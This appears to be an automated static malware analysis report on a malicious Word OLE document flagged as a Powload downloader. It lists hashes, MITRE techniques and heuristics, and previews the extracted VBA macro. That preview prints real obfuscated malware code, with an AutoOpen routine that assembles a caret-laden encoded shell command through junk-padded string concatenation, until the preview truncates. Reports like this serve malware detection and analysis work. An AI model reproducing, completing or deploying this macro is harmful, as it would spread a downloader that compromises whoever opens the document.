Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9528aed437569e44…

MALICIOUS

Office (OLE)

85.5 KB Created: 2018-08-26 23:24:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 94a42bbf41f26a85fd589395fa2cd490 SHA-1: 293523452c6555ca24ba940c953f81269b4ad6b6 SHA-256: 9528aed437569e449b6de37fa0ccf2dcfcd9acee2f26a4fcb43eebc0f87ec779
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call to execute a command, likely to download and run a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Powload-6665633-0'. The obfuscated script attempts to construct a command string, but its exact target is obscured.

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6665633-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6665633-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10332 bytes
SHA-256: 415ec68b4fb4da81340930856d7ee7dd71bd0e1f2f53e2c21ce2ae4e757f7588
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iatXllNlCj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wiTZfXhjwwqSw"
Function AfcozIPiWMf()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error 44846 * FXGNtw * 40350 * vTRQo
   Error 54531 * bDzlH / 52027 / KrNtJB
   Error 35991 / mpPOj / wdbQm / cTzlmm
GoYhPaUqIPu = "mD" + "  /" + "v " + " /R" + " " + " " + "  " + Chr(3 + 2 + 3 + 4 + 22) + " ^" + "s^Et " + "^ " + "^  " + " n" + "^a^5="
Error 34025 / PhRIBq
EORmZia = "==^A^A" + "g^A" + "AI^" + "A^A" + "C^A^g" + "AA"
Error NLOaN / Knujpa
   Error 38620 * nulTJc
   Error jzUQn * UNLjz * nirvVj / LHpwz
nTzZtzSzvi = "I^A^A" + "CAgAA^" + "I^AA" + "C^" + "A^gA^" + "AIA^A"
Error fKCPM / zUvPLJ / 98020 * WGbzjH
MaVjo = "CAg" + "^A^A^" + "I" + "^" + "A" + "AC" + "A"
Error jWUuM * LvKkBu
zcKSz = "gAAI" + "^A^0^H^" + "A9^" + "B^weA^" + "g^" + "GA" + "^jB^A" + "dAE"
Error vqGGrT * vBFmtV
   Error 89368 / DjUfKI
   Error dSrSu / zVAjG
   Error 78689 / PNidT * GkDSt * wnokTB
   Error 94566 / TRjYjY * 71362 / wbrfl
dXAmktv = "^G^" + "A" + "^jB^Qf" + "^A^sD" + "Ar^BQ" + "Y^AUG" + "Ay^B^"
Error 83761 * 4630 / LpWHA * 19780
LzzOECkKFMD = "g" + "Y^AsD" + "A" + "^zB" + "^Q^Q" + "^A^M" + "^FA^kA" + "AI" + "^A^0G^"
AfcozIPiWMf = GoYhPaUqIPu + EORmZia + nTzZtzSzvi + MaVjo + zcKSz + dXAmktv + LzzOECkKFMD
   Error 62308 * vjoZb
End Function
Function lmclproGvjq()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error 43549 / NEYZos
   Error WvGJop / ApmbAV
hTTiumr = "AlBAd^A" + "^k^E^" + "AtAQ" + "Z" + "A^s" + "^G^AvBg" + "dA4GA" + "JBwO^"
Error QABWR * tozfn
iXIin = "A" + "kC" + "^Az^B" + "^QQ^AM" + "^FA" + "^k^AA"
Error 55850 / bRhSdV
   Error 62215 * YkzfZ / GzrGI * qHjwCR
ilNKzDE = "^" + "I" + "^" + "AwC^A^U" + "^B" + "^A^U^A"
Error 4536 / SMvAjn
   Error wUUlwj / OPdYqO
   Error DlJAW / 53130
bGTwt = "0^GAk" + "^AAK" + "^" + "A" + "^U^GA" + "sBQ^a" + "^AYE" + "^" + "A^kBQ" + "Y^A8^G" + "AsB^g"
Error NhRlj * mSAIK
   Error 37222 / JzUnC / 61905 * McssrP
   Error 75510 / HtizYQ
mhILuiAfHT = "^bAc^H" + "^AvBA" + "R^A4" + "CA^x^B" + "gaA^Q" + "HA^kAw" + "^e^A^" + "k^H^AyB" + "AdA" + "s^HA" + "pA"
Error 58767 / 80498
   Error qFQjk / zACnAF / BFZtsK / fZAQE
   Error 63246 * kiJMpi
baNnZE = "^AUA^" + "ME^" + "A^6B^A^" + "JA^ACA" + "^u^BQ" + "a^A^ACA" + "^U^BAU^" + "A^0" + "^GA^" + "k^AAK"
Error 54501 * 21870 * 13027 * 67326
   Error YTtdJW * 21204 * zlfdaQ / zbOzG
aHwqjVm = "^A^g" + "G^A^" + "j^" + "BQY^" + "AUGA^" + "yBw" + "b^A" + "YGA^7^"
Error nQJiiw * lbmsAj
   Error MJiuhX * LDFRcj / 85697 * TWApFN
fwWiHTri = "A^w^" + "J^AU" + "^" + "GA4" + "BQZ^A" + "^4C^An^" + "A^" + "w^K^AIG" + "^A^3BA^" + "dAQC" + "Ar"
Error tPAEqh / YbABp
   Error qHGEF * RTwtr * 37570 * 42646
   Error SOLSFA / XcUVp / AjquuA * izIvS
kGPsAjGIUjj = "A^w^" + "J^AwFAn" + "^AwKA^M" + "GA^" + "pB^A" + "^bAIGA"
Error GMXLQ * JlqXSU
   Error djkjYT * CwYVq
BNEzf = "1^B^A" + "c^" + "AoD^A^" + "2B^gbAU" + "G^A^" + "k^" + "A^Q" + "P^A" + "M^HAB^B"
lmclproGvjq = hTTiumr + iXIin + ilNKzDE + bGTwt + mhILuiAfHT + baNnZE + aHwqjVm + fwWiHTri + kGPsAjGIUjj + BNEzf
   Error 11555 / zubBQ * zJZLr * 94582
End Function
Function UpIsMEsFUhV()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error 10142 / whFQI
   Error 21348 / mGBEQw / aXrfZX / tXUNm
   Error 20750 / cSBZw
AizfofdKqz = "w^" + "U" + "AQC" + "^A7" + "A" + "^wJ" + "A^" + "g" + "DA^4^A" + "^A^O^Ac" + "C" + "A^g" + "AQPAAC"
Error 58446 / CrBBUM
   Error zwTwn * RbzDmN * 57204 * 17352
   Error 97585 / 38778 / 12815 * 30529
   Error 70586 / 45777
GFnkibbv = "^" + "Ai^Bw" + "^dAQ^H" + "A" + "k^A" + "w" + "^O^
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.